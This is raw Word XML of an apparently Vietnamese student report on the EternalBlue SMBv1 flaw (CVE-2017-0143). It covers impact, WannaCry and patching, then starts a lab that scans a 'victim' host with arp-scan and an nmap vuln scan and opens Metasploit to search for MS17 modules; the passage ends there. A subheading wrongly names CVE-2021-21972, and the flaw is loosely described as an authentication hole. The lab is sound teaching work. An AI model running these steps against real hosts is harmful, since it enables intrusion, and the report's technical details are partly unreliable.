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B3A" w:rsidRPr="00714E67" w:rsidRDefault="00837B3A" w:rsidP="00A04EEE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.1 Tổng quan về CVE 2017-0143</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837B3A" w:rsidRPr="00714E67" w:rsidRDefault="00837B3A" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837B3A" w:rsidRPr="00714E67" w:rsidRDefault="00837B3A" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.1.1 Giới thiệu về CVE 2021-21972</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE-2017-0143 là một lỗ hổng bảo mật được phát hiện trong giao thức SMB (Server Message Block) của Microsoft Windows. Lỗ hổng này được gọi là "EternalBlue" và cho phép tin tặc từ xa thực hiện tấn công xâm nhập vào các hệ thống Windows chưa được cập nhật để lấy quyền điều khiển máy tính và lây lan qua mạng nhanh chóng. Lỗ hổng này đã được sử dụng để tạo ra cuộc tấn công ransomware WannaCry vào năm 2017, gây ra sự chú ý và ảnh hưởng lớn trên toàn cầu. Microsoft đã phát hành một bản vá cho lỗ hổng này, vì vậy các hệ thống Windows nên được cập nhật để tránh bị tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837B3A" w:rsidRPr="00714E67" w:rsidRDefault="00837B3A" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.1.2 Phạm vi ảnh hưởng</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837B3A" w:rsidRPr="00714E67" w:rsidRDefault="00837B3A" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE2017-0143 có phạm vi ảnh hưởng rộng lớn đến các hệ thống Windows chưa được cập nhật. Lỗ hổng này ảnh hưởng đến các phiên bản hệ điều hành Windows 7, Windows 8.1, Windows 10, Windows Server 2008, Windows Server 2012, và Windows Server 2016.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837B3A" w:rsidRPr="00714E67" w:rsidRDefault="00837B3A" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00837B3A" w:rsidRPr="00714E67" w:rsidRDefault="00837B3A" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lỗ hổng EternalBlue đã được sử dụng để tạo ra cuộc tấn công ransomware WannaCry vào tháng 5 năm 2017. Cuộc tấn công này đã lan rộng nhanh chóng trên toàn cầu và ảnh hưởng đến hàng ngàn tổ chức, doanh nghiệp và người dùng cá nhân trên khắp thế giới. Những nơi chịu ảnh hưởng nặng nhất bao gồm Bệnh viện Quốc gia Anh, Tập đoàn FedEx và Ngân hàng Nga.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837B3A" w:rsidRPr="00714E67" w:rsidRDefault="00837B3A" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00837B3A" w:rsidRPr="00714E67" w:rsidRDefault="00837B3A" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Với việc tận dụng lỗ hổng này, các tin tặc có thể lây nhiễm virus, tạo ra botnet và tiêm mã độc để thực hiện các cuộc tấn công tiếp theo. Vì vậy, để bảo vệ các hệ thống của mình, người dùng cần cập nhật các bản vá mới nhất và triển khai các giải pháp bảo mật hiệu quả, như tường lửa, phần mềm chống vi-rút và quản lý mật khẩu an toàn.</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837B3A" w:rsidRPr="00714E67" w:rsidRDefault="00837B3A" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.1.3 Mức độ nghiêm trọng</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837B3A" w:rsidRPr="00714E67" w:rsidRDefault="00837B3A" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00837B3A" w:rsidRPr="00714E67" w:rsidRDefault="00837B3A" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CVE-2017-0143 là một lỗ hổng bảo mật nghiêm trọng và có mức độ nguy hiểm cao. Lỗ hổng này cho phép tin tặc từ xa thực hiện các cuộc tấn công xâm nhập vào các hệ thống Windows chưa được cập nhật để lấy quyền điều khiển máy tính.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837B3A" w:rsidRPr="00714E67" w:rsidRDefault="00837B3A" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00837B3A" w:rsidRPr="00714E67" w:rsidRDefault="00837B3A" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Một khi tin tặc tận dụng được lỗ hổng này, họ có thể lây lan qua mạng và tạo ra một mạng lưới botnet để thực hiện các cuộc tấn công tiếp theo. Điều này có thể gây ra hậu quả nghiêm trọng cho các tổ chức, doanh nghiệp và người dùng cá nhân, bao gồm mất dữ liệu, tiền bạc và danh tính.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837B3A" w:rsidRPr="00714E67" w:rsidRDefault="00837B3A" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00837B3A" w:rsidRPr="00714E67" w:rsidRDefault="00837B3A" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cuộc tấn công ransomware WannaCry vào năm 2017 được tạo ra bằng cách tận dụng lỗ hổng EternalBlue và đã lan rộng nhanh chóng trên toàn cầu, gây ra sự chú ý và ảnh hưởng lớn đến các tổ chức, doanh nghiệp và người dùng cá nhân.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837B3A" w:rsidRPr="00714E67" w:rsidRDefault="00837B3A" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00837B3A" w:rsidRPr="00714E67" w:rsidRDefault="00837B3A" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vì vậy, Microsoft đã phát hành các bản vá để sửa lỗi EternalBlue, và người dùng nên cập nhật hệ thống của mình càng sớm càng tốt để tránh bị tấn công. Ngoài ra, các tổ chức nên triển khai các giải pháp bảo mật hiệu quả để giảm thiểu nguy cơ tấn công từ bên ngoài.</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00525FF2" w:rsidRPr="00714E67" w:rsidRDefault="00837B3A" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.1.4 Phân tích lỗ hổng</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE-2017-0143 là một lỗ hổng bảo mật ở giao thức SMBv1 (Server Message Block version 1) của hệ điều hành Windows của Microsoft. Lỗ hổng này cho phép tin tặc tấn công từ xa vào các hệ thống chưa được cập nhật và lấy quyền kiểm soát hoàn toàn trên hệ thống đó.</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Cụ thể, lỗ hổng này liên quan đến việc xử lý các gói tin SMBv1 trên hệ thống Windows. Tin tặc có thể gửi một gói tin SMBv1 đặc biệt đến hệ thống đang chạy SMBv1 mà chưa được cập nhật. Gói tin này chứa một lỗ hổng xác thực, cho phép tin tặc truy cập vào hệ thống và lấy quyền điều khiển toàn bộ hệ thống.</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Sau khi có quyền điều khiển hệ thống, tin tặc có thể thực hiện nhiều hoạt động độc hại, bao gồm:</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Truy cập vào các tài nguyên trên hệ thống, chẳng hạn như các tệp và thư mục, và sao chép, sửa đổi hoặc xóa chúng.</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Chèn mã độc và lây lan mã độc sang các hệ thống khác trên cùng mạng. Điều này cho phép tin tặc lây nhiễm malware, virus hoặc các chương trình độc hại khác vào các hệ thống khác.</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Đánh cắp dữ liệu cá nhân, thông tin đăng nhập hoặc các thông tin khác trên hệ thống.</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Lỗ hổng này đã được khai thác để tạo ra một số cuộc tấn công nổi tiếng, bao gồm cuộc tấn công ransomware WannaCry vào năm 2017. WannaCry đã lây lan rộng khắp trên toàn cầu và gây ra thiệt hại nghiêm trọng cho nhiều tổ chức và doanh nghiệp.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vì vậy, Microsoft đã phát hành các bản vá để sửa lỗi EternalBlue và khuyến khích người dùng cập nhật các bản vá này càng sớm càng tốt. Ngoài ra, người dùng cần triển khai các giải pháp bảo mật hiệu quả như tường lửa, phần mềm chống vi-rút và quản lý mật khẩu an toàn để giảm thiểu nguy cơ bị tấn công từ bên ngoài.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A04EEE" w:rsidRDefault="00A04EEE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00A04EEE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Thực nghiệm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng câu lênh: </w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>arp-scan -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Để tìm kiếm địa chỉ IP của máy victim </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:keepNext/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="634BD808" wp14:editId="6FABA99B">
            <wp:extent cx="5181600" cy="1811494"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18422860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6008" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5182552" cy="1811827"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:firstLine="1980"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc130209108"/>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12</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. tìm kiến địa ip của máy nạn nhân</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sử dụng câu lệnh: </w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>namp -script vuln 192.168.80.136</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Để phát hiện các lỗ hổng bảo mật, xác định các thông tin hệ thống và tìm kiếm các dịch vụ mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:keepNext/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2796A56F" wp14:editId="59554C32">
            <wp:extent cx="5760720" cy="5072864"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="789319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9740" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="5072864"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc130209109"/>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">hình </w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. thực hiện câu lệnh namp -script vuln 192.168.80.136 và kết</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bước 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: Sử dụng câu lệnh: “msfconsole” là một công cụ được sử dụng để tìm kiếm, khai thác và kiểm tra các lỗ hổng bảo mật trên các thiết bị mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:keepNext/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3858EED5" wp14:editId="46CF44F5">
            <wp:extent cx="4578927" cy="3225871"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1711382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2843" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId6"/>
                    <a:srcRect b="27926"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4579642" cy="3226375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:firstLine="1980"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc130209111"/>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15</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. sử dụng câu lệnh: “msfconsole”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiếp theo chúng ta sử dụng câu lệnh: </w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>search ms17</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
